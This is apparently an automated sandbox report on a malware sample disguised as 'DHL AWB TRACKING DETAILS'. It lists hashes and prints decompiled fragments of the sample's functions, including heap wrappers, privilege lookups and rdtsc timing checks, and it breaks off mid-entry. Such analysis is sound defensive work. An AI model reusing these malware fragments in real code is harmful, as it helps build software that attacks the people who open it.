                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c296d7cc227b860dcb26b43edf4d7323719ee8a72d2a24e1f134581d41709b8f
                    • Instruction ID: 41887b8759142fbb3d7f1feb8a98236d473b17719def4235c2a79c670be888c7
                    • Opcode Fuzzy Hash: c296d7cc227b860dcb26b43edf4d7323719ee8a72d2a24e1f134581d41709b8f
                    • Instruction Fuzzy Hash: 17900261242041535656B16944045074006F7E0382791C022A5404950C8576989AE661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A499A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 85996a527967fcb2325f3aba3c2b71e16d3bb73aa64ee26a2deaeff0e4ffcf37
                    • Instruction ID: 1feb496b191fc441b15c9f44a378969dd7f4dd2a3fa43bc79c875e267a888c90
                    • Opcode Fuzzy Hash: 85996a527967fcb2325f3aba3c2b71e16d3bb73aa64ee26a2deaeff0e4ffcf37
                    • Instruction Fuzzy Hash: 3B9002A134100443D21161694414B060005E7E1342F51C025E5054554D8669CC96B166
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3a597ed6de40e24d65db6b3613f8c92b6cf8c32f140659bfd95cd28af14cb1a4
                    • Instruction ID: cd18590575c2b322f46f28179e48b638b62d154e3f57e717e1138a8122dace73
                    • Opcode Fuzzy Hash: 3a597ed6de40e24d65db6b3613f8c92b6cf8c32f140659bfd95cd28af14cb1a4
                    • Instruction Fuzzy Hash: 2B9002B120100403D251716944047460005E7D0342F51C021A9054554E86A98DD9B6A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 484818f7ac1a7f44c7c6a895d238a616824eb6d48482aaa261acf5391329c5ac
                    • Instruction ID: 395bf6263286ad70b641d49cb16516253b58af2615c1288a40097d6e6d3034c8
                    • Opcode Fuzzy Hash: 484818f7ac1a7f44c7c6a895d238a616824eb6d48482aaa261acf5391329c5ac
                    • Instruction Fuzzy Hash: C3900261601000434251717988449064005FBE1352751C131A4988550D85A988A9A6A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: f8503e72e1dc65af4ca0ce9addbf57eb335d904996dba7031ef9584864db2d12
                    • Instruction ID: a6f67a8277a3b3be8b89b917850b13e78702fe5dd5bedc71adf87a0afe52c33f
                    • Opcode Fuzzy Hash: f8503e72e1dc65af4ca0ce9addbf57eb335d904996dba7031ef9584864db2d12
                    • Instruction Fuzzy Hash: 8490027120140403D2116169481470B0005E7D0343F51C021A5154555D86758895B5B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ca7bd9f394ae9b964a3cac70d481b3340606d3e811df99ef0a54e8aea18af5ec
                    • Instruction ID: 64d2cfaf13f9309bcd7403859deaf896cc2873968d7599671b0a295e5d50db3c
                    • Opcode Fuzzy Hash: ca7bd9f394ae9b964a3cac70d481b3340606d3e811df99ef0a54e8aea18af5ec
                    • Instruction Fuzzy Hash: FC90026121180043D31165794C14B070005E7D0343F51C125A4144554CC96588A5A561
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A495D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: e35e0022b6cdbdab7016df3c7a659f72f9d9a7478746fa8472fed56286336965
                    • Instruction ID: 08c33894a5ed7cb2586842ca04486c4597f6e0c3905499bcde100bcd11c8e5f2
                    • Opcode Fuzzy Hash: e35e0022b6cdbdab7016df3c7a659f72f9d9a7478746fa8472fed56286336965
                    • Instruction Fuzzy Hash: 0D9002A120200003421671694414616400AE7E0342B51C031E5004590DC57588D5B165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 172c38909e115b066a6124b9cc0e1afc9d2dd833fa4fbbce887c8884f8c0d43c
                    • Instruction ID: 1315aa69fdc5ae92524b7a957cf78082d5d3c7872c89ceafb40b3329d7236b15
                    • Opcode Fuzzy Hash: 172c38909e115b066a6124b9cc0e1afc9d2dd833fa4fbbce887c8884f8c0d43c
                    • Instruction Fuzzy Hash: 75900265211000030216A56907045070046E7D5392351C031F5005550CD67188A5A161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A496E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6f35625760975cb278921bc5e890fbe3bc0c1561eeac67e4772e375d796f345e
                    • Instruction ID: f1994b6a4f452d4f91f2f1e37c547d66f4cd1f9836b374957a5211878604265d
                    • Opcode Fuzzy Hash: 6f35625760975cb278921bc5e890fbe3bc0c1561eeac67e4772e375d796f345e
                    • Instruction Fuzzy Hash: 0890027120108803D2216169840474A0005E7D0342F55C421A8414658D86E588D5B161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 0501d3d0434ed8d4f2c6a1d4e5734e5ab884dd6bf5aafc99480ac9560ea2329a
                    • Instruction ID: 82818c37d7a7e9e8cb6d625da2237b27d33e1dddfe8bbaa70537b02e9c407086
                    • Opcode Fuzzy Hash: 0501d3d0434ed8d4f2c6a1d4e5734e5ab884dd6bf5aafc99480ac9560ea2329a
                    • Instruction Fuzzy Hash: 3F90027120100803D2917169440464A0005E7D1342F91C025A4015654DCA658A9DB7E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A497A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 15f40edd31ee3081fac04602dd034eecbd0caa10db686763f8378a05b6436114
                    • Instruction ID: 39b11731bdff199837e062ce116313473b0146bb55da1fdd5054dad37b832a5f
                    • Opcode Fuzzy Hash: 15f40edd31ee3081fac04602dd034eecbd0caa10db686763f8378a05b6436114
                    • Instruction Fuzzy Hash: 7690026130100003D251716954186064005F7E1342F51D021E4404554CD965889AA262
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                    • Instruction ID: f455264d3e230fdaa5da93997a6747d008b443e26f4d11623bc6616487098b57
                    • Opcode Fuzzy Hash: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                    • Instruction Fuzzy Hash: 2890026921300003D2917169540860A0005E7D1343F91D425A4005558CC96588ADA361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                    • Instruction ID: ce6b1a714e862e6b33b3a65d62e18ad929d5c69ff1b880c89aa1bdfe96938745
                    • Opcode Fuzzy Hash: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                    • Instruction Fuzzy Hash: 0F90027120100403D21165A954086460005E7E0342F51D021A9014555EC6B588D5B171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00409AB0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE10( &_v284, 0x104);
						E0041C480( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                    0x00409abb
                    0x00409ac3
                    0x00409ac5
                    0x00409aca
                    0x00409acf
                    0x00409ae2
                    0x00409ae7
                    0x00409af0
                    0x00409afc
                    0x00409b0f
                    0x00409b14
                    0x00409b17
                    0x00409b20
                    0x00409b32
                    0x00409b37
                    0x00409b3c
                    0x00000000
                    0x00000000
                    0x00409b3e
                    0x00409b42
                    0x00000000
                    0x00000000
                    0x00409b44
                    0x00000000
                    0x00409b42
                    0x00409b46
                    0x00409b49
                    0x00409b4f
                    0x00409b51
                    0x00409b5c
                    0x00409b61
                    0x00409b64
                    0x00409b71
                    0x00409b7c
                    0x00409b7e
                    0x00409b84
                    0x00409b88
                    0x00409b8b
                    0x00409b8b
                    0x00409b92
                    0x00409b95
                    0x00409b9a
                    0x00409ba7
                    0x00409ad6
                    0x00409ad6
                    0x00409ad6

                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                    C-Code - Quality: 100%
                    			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                    0x0041a647
                    0x0041a652
                    0x0041a65d
                    0x0041a661

                    APIs
                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6EA
                    • API String ID: 1279760036-1400015478
                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 204 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a480 213->215 216 40838d 213->216 215->216 216->214
                    C-Code - Quality: 82%
                    			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(_a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}











                    0x0040831f
                    0x00408323
                    0x0040832e
                    0x0040833e
                    0x0040834e
                    0x00408353
                    0x0040835a
                    0x0040835d
                    0x0040836a
                    0x0040836c
                    0x0040836e
                    0x0040838b
                    0x0040838b
                    0x00000000
                    0x0040838d
                    0x00408392

                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A7C3 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 246 41a7c3-41a7ea call 41af60 249 41a7ef-41a804 LookupPrivilegeValueW 246->249
                    C-Code - Quality: 46%
                    			E0041A7C3(void* __eax, void* __ebx) {
				int _t12;
				void* _t19;

				_push(ds);
				asm("int3");
				asm("pushfd");
				_t9 =  *0xFFFFFFFFA4B5A4FF;
				E0041AF60(_t19,  *0xFFFFFFFFA4B5A4FF,  *0xFFFFFFFFA4B5A4FF + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
				_t12 = LookupPrivilegeValueW( *0xFFFFFFFFA4B5A503,  *0xFFFFFFFFA4B5A507,  *0xFFFFFFFFA4B5A50B); // executed
				return _t12;
			}





                    0x0041a7ca
                    0x0041a7cb
                    0x0041a7cc
                    0x0041a7d3
                    0x0041a7ea
                    0x0041a800
                    0x0041a804

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 02d7213a755358cdc406efaebd902722de50c30c7831683f4a74658f7932d97a
                    • Instruction ID: 257231a3eb2c6c55949406b2776163c321740c1ddf42cc11d16627983e803823
                    • Opcode Fuzzy Hash: 02d7213a755358cdc406efaebd902722de50c30c7831683f4a74658f7932d97a
                    • Instruction Fuzzy Hash: 55E092B16002147BDB10DF89CC85EE73BAADF48250F108565FD0CA7751C575E8158BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 250 41a662-41a663 251 41a665-41a66e 250->251 252 41a6ad-41a6d8 call 41af60 ExitProcess 250->252 251->252
                    C-Code - Quality: 53%
                    			E0041A662(void* __eax, void* __eflags, intOrPtr _a4, int _a8, long _a12, void* _a16) {
				intOrPtr _v117;
				char _t20;
				void* _t26;
				void* _t31;

				asm("outsb");
				if(__eflags >= 0) {
					asm("sbb cl, [ecx]");
					__eflags = _t26 - _v117;
					_t13 = _a4;
					E0041AF60(_t31, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t13 + 0xa14)), 0, 0x36);
					ExitProcess(_a8);
				}
				asm("sbb eax, 0x23c66e19");
				asm("int 0xe2");
				_push(_t36);
				_t17 = _a4;
				_push(_t32);
				_t3 = _t17 + 0xc74; // 0xc74
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t20 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t20;
			}







                    0x0041a662
                    0x0041a663
                    0x0041a6ad
                    0x0041a6af
                    0x0041a6b3
                    0x0041a6ca
                    0x0041a6d8
                    0x0041a6d8
                    0x0041a667
                    0x0041a66e
                    0x0041a670
                    0x0041a673
                    0x0041a679
                    0x0041a67f
                    0x0041a687
                    0x0041a69d
                    0x0041a6a1

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 5667fce54e644c444c615bbc56fe4a9fd24b775b3059d51cbd69bcc9268ffd27
                    • Instruction ID: 77d67e782ae1523f9cc1b76920e662f0b0ff1e765610986cecf53fb9dfd1526f
                    • Opcode Fuzzy Hash: 5667fce54e644c444c615bbc56fe4a9fd24b775b3059d51cbd69bcc9268ffd27
                    • Instruction Fuzzy Hash: 1AE0DF312001047BC7219BB9CCD5FD73F649F1A744F288199B98DAB302C932A625CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 255 41a670-41a6a1 call 41af60 RtlFreeHeap
                    C-Code - Quality: 100%
                    			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                    0x0041a67f
                    0x0041a687
                    0x0041a69d
                    0x0041a6a1

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 258 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                    C-Code - Quality: 100%
                    			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				_t7 = _a4;
				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                    0x0041a7d3
                    0x0041a7ea
                    0x0041a800
                    0x0041a804

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A807 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041A807() {
				int _t10;
				void* _t15;
				void* _t19;

				_t7 =  *((intOrPtr*)(_t19 + 8));
				E0041AF60(_t15,  *((intOrPtr*)(_t19 + 8)),  *((intOrPtr*)(_t19 + 8)) + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW( *(_t19 + 0xc),  *(_t19 + 0x10),  *(_t19 + 0x14)); // executed
				return _t10;
			}






                    0x0041a7d3
                    0x0041a7ea
                    0x0041a800
                    0x0041a804

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
